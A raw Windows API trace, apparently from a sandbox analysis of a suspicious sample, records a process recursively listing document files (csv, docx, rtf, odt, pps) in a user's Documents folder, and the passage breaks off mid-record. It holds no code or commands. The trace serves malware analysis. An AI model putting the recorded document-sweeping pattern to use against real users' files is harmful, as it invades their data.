[0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d00 | out: hHeap=0x650000) returned 1 [0074.103] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6050f080, ftCreationTime.dwHighDateTime=0x1d5dbad, ftLastAccessTime.dwLowDateTime=0x156f28d0, ftLastAccessTime.dwHighDateTime=0x1d5e282, ftLastWriteTime.dwLowDateTime=0x156f28d0, ftLastWriteTime.dwHighDateTime=0x1d5e282, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.103] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6050f080, ftCreationTime.dwHighDateTime=0x1d5dbad, ftLastAccessTime.dwLowDateTime=0x156f28d0, ftLastAccessTime.dwHighDateTime=0x1d5e282, ftLastWriteTime.dwLowDateTime=0x156f28d0, ftLastWriteTime.dwHighDateTime=0x1d5e282, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.103] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76dfe470, ftCreationTime.dwHighDateTime=0x1d5dae8, ftLastAccessTime.dwLowDateTime=0x7a81de0, ftLastAccessTime.dwHighDateTime=0x1d5db81, ftLastWriteTime.dwLowDateTime=0x7a81de0, ftLastWriteTime.dwHighDateTime=0x1d5db81, nFileSizeHigh=0x0, nFileSizeLow=0xd24a, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="-V0 o3_nR9rc3_2DHH4.csv", cAlternateFileName="-V0O3_~1.CSV")) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cf0 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b528 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b540 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.103] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cf0 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.103] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.103] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cf0 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b540 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b528 | out: hHeap=0x650000) returned 1 [0074.104] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb1b8 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.104] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb1b8 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.104] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b540 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb1b8 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b510 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b540 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb1b8 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b528 | out: hHeap=0x650000) returned 1 [0074.104] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0074.104] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0074.104] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.104] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abb3490, ftCreationTime.dwHighDateTime=0x1d5df7c, ftLastAccessTime.dwLowDateTime=0xc074c380, ftLastAccessTime.dwHighDateTime=0x1d5de08, ftLastWriteTime.dwLowDateTime=0xc074c380, ftLastWriteTime.dwHighDateTime=0x1d5de08, nFileSizeHigh=0x0, nFileSizeLow=0xd070, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="8KAz.docx", cAlternateFileName="8KAZ~1.DOC")) returned 1 [0074.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b528 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b540 | out: hHeap=0x650000) returned 1 [0074.105] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb1b8 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.105] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb1b8 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.105] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b528 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb1b8 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cd0 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b510 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cc0 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b528 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c20 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b540 | out: hHeap=0x650000) returned 1 [0074.105] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0074.105] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c80 | out: hHeap=0x650000) returned 1 [0074.105] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.105] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7e0f10, ftCreationTime.dwHighDateTime=0x1d5e5c6, ftLastAccessTime.dwLowDateTime=0xf64cede0, ftLastAccessTime.dwHighDateTime=0x1d5e360, ftLastWriteTime.dwLowDateTime=0xf64cede0, ftLastWriteTime.dwHighDateTime=0x1d5e360, nFileSizeHigh=0x0, nFileSizeLow=0x17fea, dwReserved0=0x10, dwReserved1=0x657690, cFileName="B1Y6naM2jHwq3MoZolB.ots", cAlternateFileName="B1Y6NA~1.OTS")) returned 1 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd471860, ftCreationTime.dwHighDateTime=0x1d5e4c0, ftLastAccessTime.dwLowDateTime=0xe53b1530, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0xe53b1530, ftLastWriteTime.dwHighDateTime=0x1d5e177, nFileSizeHigh=0x0, nFileSizeLow=0x15e3b, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="f2lgxu.rtf", cAlternateFileName="")) returned 1 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f0f0f0, ftCreationTime.dwHighDateTime=0x1d5e547, ftLastAccessTime.dwLowDateTime=0x24d4fc30, ftLastAccessTime.dwHighDateTime=0x1d5dd39, ftLastWriteTime.dwLowDateTime=0x24d4fc30, ftLastWriteTime.dwHighDateTime=0x1d5dd39, nFileSizeHigh=0x0, nFileSizeLow=0x2691, dwReserved0=0x10, dwReserved1=0x657690, cFileName="G856.ots", cAlternateFileName="")) returned 1 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e07ddb0, ftCreationTime.dwHighDateTime=0x1d5e195, ftLastAccessTime.dwLowDateTime=0x9abbf600, ftLastAccessTime.dwHighDateTime=0x1d5de7f, ftLastWriteTime.dwLowDateTime=0x9abbf600, ftLastWriteTime.dwHighDateTime=0x1d5de7f, nFileSizeHigh=0x0, nFileSizeLow=0x58fc, dwReserved0=0x10, dwReserved1=0x657690, cFileName="GvoASfHILqm4y.odt", cAlternateFileName="GVOASF~1.ODT")) returned 1 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.106] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0ad840, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0x96ac91b0, ftLastAccessTime.dwHighDateTime=0x1d5dda2, ftLastWriteTime.dwLowDateTime=0x96ac91b0, ftLastWriteTime.dwHighDateTime=0x1d5dda2, nFileSizeHigh=0x0, nFileSizeLow=0x9f51, dwReserved0=0x10, dwReserved1=0x657690, cFileName="hvT5kT0PFopfwSD QzN.pps", cAlternateFileName="HVT5KT~1.PPS")) returned 1 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4787dab0, ftCreationTime.dwHighDateTime=0x1d5e1ba, ftLastAccessTime.dwLowDateTime=0x2d78f050, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0x2d78f050, ftLastWriteTime.dwHighDateTime=0x1d5e025, nFileSizeHigh=0x0, nFileSizeLow=0x9094, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="isuTz.pps", cAlternateFileName="")) returned 1 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f218dd0, ftCreationTime.dwHighDateTime=0x1d5de91, ftLastAccessTime.dwLowDateTime=0xe8234710, ftLastAccessTime.dwHighDateTime=0x1d5e071, ftLastWriteTime.dwLowDateTime=0xe8234710, ftLastWriteTime.dwHighDateTime=0x1d5e071, nFileSizeHigh=0x0, nFileSizeLow=0x16989, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Ob0CMu.csv", cAlternateFileName="")) returned 1 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47989120, ftCreationTime.dwHighDateTime=0x1d5e7dc, ftLastAccessTime.dwLowDateTime=0xba40d220, ftLastAccessTime.dwHighDateTime=0x1d5e69a, ftLastWriteTime.dwLowDateTime=0xba40d220, ftLastWriteTime.dwHighDateTime=0x1d5e69a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="orhLGiSQMqRNAIhM", cAlternateFileName="ORHLGI~1")) returned 1 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.107] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.108] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\*", lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47989120, ftCreationTime.dwHighDateTime=0x1d5e7dc, ftLastAccessTime.dwLowDateTime=0xba40d220, ftLastAccessTime.dwHighDateTime=0x1d5e69a, ftLastWriteTime.dwLowDateTime=0xba40d220, ftLastWriteTime.dwHighDateTime=0x1d5e69a, 